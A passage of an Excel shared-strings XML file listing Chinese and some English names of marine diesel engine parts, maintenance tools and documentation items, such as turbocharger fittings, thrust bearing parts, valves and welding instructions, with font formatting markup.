  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套支撑环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>表面保护规范</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>虹吸管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>聚四氟乙烯带</t>
  </si>
  <si>
    <t>温度传感器</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>碟形垫圆座</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>端子</t>
  </si>
  <si>
    <t>接线箱/电缆和插头</t>
  </si>
  <si>
    <t>报警接线箱</t>
  </si>
  <si>
    <t>检验规范</t>
  </si>
  <si>
    <t>测试及 充注设备</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动滤器集油盘残油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>温度计插套</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>螺纹说明</t>
  </si>
  <si>
    <t>节流螺钉</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>推力轴承布置</t>
  </si>
  <si>
    <t>推力块布置图</t>
  </si>
  <si>
    <t>推力轴承环半</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>贯穿螺栓</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拧紧说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>延时继电器</t>
  </si>
  <si>
    <t>形状和位置公差</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座校中工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>凸轮轴安装工具</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆预紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套打磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主机校中工具</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟总管安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>通用工具-驱动螺栓</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器调节工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>维护工具及说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头预紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆垫片安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头预紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和十字头预紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀打磨工具和设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离器安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>齿条</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振测量轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>传感器壳体</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传送工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>增压器</t>
  </si>
  <si>
    <t>增压器监测</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>增压器安装件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行星轮式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋钮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘出工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>悬吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>上半轴承盖</t>
  </si>
  <si>
    <t>上半轴瓦</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆上轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>上盖</t>
  </si>
  <si>
    <t>上壳体</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套上部绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上平台排气侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上平台燃油侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部二半环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>上弹簧座</t>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阀体</t>
  </si>
  <si>
    <t>阀壳</t>
  </si>
  <si>
    <t>阀控制块</t>
  </si>
  <si>
    <t>两半式阀套</t>
  </si>
  <si>
    <t>阀盘</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨阀机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阀导套</t>
  </si>
  <si>
    <t>阀壳体</t>
  </si>
  <si>
    <t>阀针</t>
  </si>
  <si>
    <t>阀块</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀防护装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀保护器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阀座</t>
  </si>
  <si>
    <t>阀行程传感器</t>
  </si>
  <si>
    <t>阀芯</t>
  </si>
  <si>
    <t>透气管</t>
  </si>
  <si>
    <t>曲柄箱透气管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水放气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器透气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器排放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>竖直标记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垂直排油口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴减震器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壁板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>瓦锡兰材料标准</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>瓦锡兰铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗装置污水出水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗装置进气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>水导套</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>气水分离器</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抗磨凸起打磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>筋板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接和质量说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接顺序以及板编号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接顺序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>焊接说明</t>
  </si>
  <si>
    <t>焊接顺序</t>
  </si>
  <si>
    <t>轮齿</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝网</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>共轨单元接线</t>
  </si>
  <si>
    <t>Crosshead pump</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CHECKING GAUGE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE I-BROAD FLANGED BEAM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE SPRING CLIP</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>DUPLEX FILTER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>GUIDELINES</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SEATING WASHER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SELF-ADHESIVE LABEL SET</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SLOTTED COUNTERSUNK HEAD SCREW</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>TENSION LOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEAKAGE COLLECT., WASHING SYSTEM</t>
  </si>
  <si>
    <t>LEAKAGE COLLECTION/WASHING SYSTEM</t>
  </si>
  <si>
    <t>OIL FUNNEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES</t>
  </si>
  <si>
    <t>4 CONDUCTOR EARTH TERM. BLOCK</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>TOOL PANNEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">ENGINE STAY  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE STAY ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TRANSMITTER ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADDITIONAL ITEMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSISTION PIECE ASSY.</t>
  </si>
  <si>
    <t>ARRANGEMENT</t>
  </si>
  <si>
    <t>DIAL-THERMOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT  BAR</t>
  </si>
  <si>
    <t>PIPE BRACKET FITTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL</t>
  </si>
  <si>
    <t>U-TUBE-GAUGE</t>
  </si>
  <si>
    <t>STEEL STRIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT ENCODER DRIVE</t>
  </si>
  <si>
    <t>CABLE CLAMP</t>
  </si>
  <si>
    <t>CONNECTING UNIT</t>
  </si>
  <si>
    <t>CONNECTION FLANGE</t>
  </si>
  <si>
    <t>COUPLING DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
